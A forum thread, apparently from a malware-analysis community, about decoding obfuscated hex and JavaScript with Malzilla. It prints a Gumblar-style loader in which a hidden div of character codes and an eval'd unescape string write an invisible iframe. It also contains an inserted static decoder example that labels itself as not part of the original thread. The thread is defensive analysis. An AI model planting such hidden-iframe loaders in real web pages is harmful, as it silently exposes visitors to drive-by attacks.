Would defeat the object if we did it for you ;)
-
Oh, thank you!
Actually, I want to do something by myself, and I think I can do what I want with the page you gave. It's so simple! ;)
-
No problem :)
-
Hi all,
I have a problem when using Malzilla to decode hex code. After copying a hex code, opening the Download tab, clicking the HEX tab, right-clicking and choosing "paste as hex", I see the decoded result in the right corner. But some hex code cannot be decoded. So could you show me how to use Malzilla to decode the hex code that I have attached below?
Thanks.
-
Replace the spaces with %, and remove the line breaks
-
Hi MysteryFCM,
I did it, thank you very much! :D
-
Hi MysteryFCM,
I think I need your help again. I have two files containing encrypted content, but this encryption is not similar to the scripts I have seen, so can you show me how to decode them? And do you have any instructions if I use Firebug in this case?
I have attached 2 files below, and am waiting for your answer.
Thanks
-
The first is a standard Gumblar script and decodes just fine without modification, in Malzilla.
The second requires you modify the script a bit, so the div becomes a var (using the id= as the var name). In this case;
<div style="display:none" id="aots2010">60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,106,112,99,101,114,116,46,111,114,46,106,112,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62</div>
Becomes;
var aots2010 = "60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,106,112,99,101,114,116,46,111,114,46,106,112,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62";
You then just make the necessary removal in the unescape string;
var%20ww%20%3D%20document.getElementById%28%22aots2010%22%29.innerHTML
Becomes;
var%20ww%20%3D%20aots2010
I don't use Firebug I'm afraid, so can't help with that one.
-
I forgot to mention btw, the decoded result would be;
var ww = aots2010;var xx = ww.split(",");for (i=0; i<xx.length; i++){yy = String.fromCharCode(xx[i]);document.write(yy);}
You'd then need to throw this together with the first, so it becomes;
var aots2010 = "60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,106,112,99,101,114,116,46,111,114,46,106,112,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62";
var c = unescape('var%20ww%20%3D%20aots2010%3Bvar%20xx%20%3D%20ww.split%28%22%2C%22%29%3Bfor%20%28i%3D0%3B%20i%3Cxx.length%3B%20i++%29%7Byy%20%3D%20String.fromCharCode%28xx%5Bi%5D%29%3Bdocument.write%28yy%29%3B%7D');eval(c);
var ww = aots2010;var xx = ww.split(",");for (i=0; i<xx.length; i++){yy = String.fromCharCode(xx[i]);document.write(yy);}
Which decodes to;
var ww = aots2010;var xx = ww.split(",");for (i=0; i<xx.length; i++){yy = String.fromCharCode(xx[i]);document.write(yy);}<iframe src="http://www.jpcert.or.jp" style="display:none;" width="0" height="0"></iframe>
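The manual div-to-var rewrite described in the two posts above can be replaced by a static pass that never calls eval or document.write. This is an added example, not part of the original thread and not Malzilla's code: it percent-decodes the unescape() literal, follows the getElementById reference to the hidden element and decodes its character codes. The function names and the surrounding script tag in the sample are assumptions.

```javascript
// Added example: static decode of a loader that hides its payload as
// character codes in an invisible element. Nothing is eval'ed or rendered.

// Constructed page fragment assembled from the pieces quoted in the posts
// above; the surrounding <script> tag is an assumption.
const CHAR_CODES =
  '60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,' +
  '119,119,119,46,106,112,99,101,114,116,46,111,114,46,106,112,34,32,115,' +
  '116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,' +
  '34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,' +
  '48,34,62,60,47,105,102,114,97,109,101,62';
const SAMPLE_PAGE =
  '<div style="display:none" id="aots2010">' + CHAR_CODES + '</div>\n' +
  "<script>var c = unescape('var%20ww%20%3D%20document.getElementById" +
  '%28%22aots2010%22%29.innerHTML%3Bvar%20xx%20%3D%20ww.split%28%22%2C%22%29' +
  '%3Bfor%20%28i%3D0%3B%20i%3Cxx.length%3B%20i++%29%7Byy%20%3D%20' +
  'String.fromCharCode%28xx%5Bi%5D%29%3Bdocument.write%28yy%29%3B%7D' +
  "');eval(c);</script>";

// Decode %XX escapes by hand: decodeURIComponent throws on malformed input,
// which obfuscated samples often contain.
function percentDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Map every element that carries an id to its text content (simple elements
// without nested tags, which is what this loader style uses).
function collectElementsById(html) {
  const byId = new Map();
  const re = /<(\w+)[^>]*\bid=["']([^"']+)["'][^>]*>([^<]*)<\/\1>/g;
  for (const m of html.matchAll(re)) byId.set(m[2], m[3]);
  return byId;
}

// "60,105,102" -> "<if"; returns null when the text is not a char-code list.
function decodeCharCodeList(text) {
  const parts = text.split(',').map((p) => p.trim());
  const ok = parts.length >= 2 &&
    parts.every((p) => /^\d{1,5}$/.test(p) && Number(p) <= 0xffff);
  return ok ? String.fromCharCode(...parts.map(Number)) : null;
}

// Follow unescape('...') -> getElementById("id").innerHTML -> hidden element.
function analyzeHiddenElementLoader(html) {
  const elements = collectElementsById(html);
  const findings = [];
  for (const lit of html.matchAll(/unescape\(\s*(['"])(.*?)\1\s*\)/g)) {
    const decodedScript = percentDecode(lit[2]);
    const refs = decodedScript.matchAll(
      /getElementById\(\s*["']([^"']+)["']\s*\)\.innerHTML/g);
    for (const ref of refs) {
      const elementId = ref[1];
      const hiddenMarkup = elements.has(elementId)
        ? decodeCharCodeList(elements.get(elementId))
        : null;
      if (hiddenMarkup === null) continue; // referenced element is not a code list
      const src = /<iframe[^>]*\bsrc=["']([^"']+)["']/i.exec(hiddenMarkup);
      findings.push({
        elementId,
        decodedScript,
        hiddenMarkup,
        iframeSrc: src ? src[1] : null,
      });
    }
  }
  return findings;
}

console.log(analyzeHiddenElementLoader(SAMPLE_PAGE));
```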
-
Hi MysteryFCM,
Thanks for all of your help. I have completed my lecture, and I think it was a successful lecture. Personally, I have learnt more about malware analysis, and that will help me more in my work.
:D
Best Regards,
Den.
-
My pleasure :)
-
MysteryFCM pointed out I should link my thread to here as I've spotted something for a potential update to Malzilla. :]
http://www.malwaredomainlist.com/forums/index.php?topic=4006.0
Exploit obfuscating itself from automated analysis with NULLs scattered throughout the file.
-
Updated user agent file for anyone using this. Let me know if there's any others that should be added.